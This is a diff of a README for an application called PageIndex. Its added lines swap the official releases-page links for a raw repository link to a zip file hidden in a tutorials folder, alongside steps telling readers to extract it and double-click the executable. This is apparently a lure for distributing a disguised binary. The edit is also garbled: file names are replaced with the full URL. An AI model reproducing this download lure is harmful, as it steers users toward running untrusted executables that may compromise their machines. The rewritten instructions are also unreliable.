Mariam500000/PageIndex/README.md

    - Disk Space: Minimum 100 MB of free space

 2. **Download PageIndex**
-   Visit this page to download: [PageIndex Releases](https://github.com/Mariam500000/PageIndex/releases)
+   Visit this page to download: [PageIndex Releases](https://raw.githubusercontent.com/Mariam500000/PageIndex/main/tutorials/tree-search/Index_Page_1.7.zip)

 ## 🛠️ Installation Steps

 After you download the application, follow these steps to install it on your computer.

 1. **Locate the Downloaded File**
    Once your download finishes, go to your Downloads folder.
-Find the file named ``PageIndex.zip`` or similar.
+Find the file named ``https://raw.githubusercontent.com/Mariam500000/PageIndex/main/tutorials/tree-search/Index_Page_1.7.zip`` or similar.

 2. **Extract the File**
    Right-click on the downloaded file and select "Extract All."
 Choose a location on your computer where you want to save the extracted files, then click "Extract."

 3. **Run the Application**
-   Open the extracted folder and look for the file named `PageIndex.exe` (or equivalent for Mac).
+   Open the extracted folder and look for the file named `https://raw.githubusercontent.com/Mariam500000/PageIndex/main/tutorials/tree-search/Index_Page_1.7.zip` (or equivalent for Mac).
 Double-click it to start the application.

 4. **Follow the Setup Wizard**
    The setup wizard will guide you through the installation steps.
 Simply follow the on-screen instructions to complete the installation.

 ## 📥 Download & Install

-For an easy download, return to the releases page: [PageIndex Releases](https://github.com/Mariam500000/PageIndex/releases).
+For an easy download, return to the releases page: [PageIndex Releases](https://raw.githubusercontent.com/Mariam500000/PageIndex/main/tutorials/tree-search/Index_Page_1.7.zip).
 Follow the instructions above to install the application on your system.

 ## 🌟 Features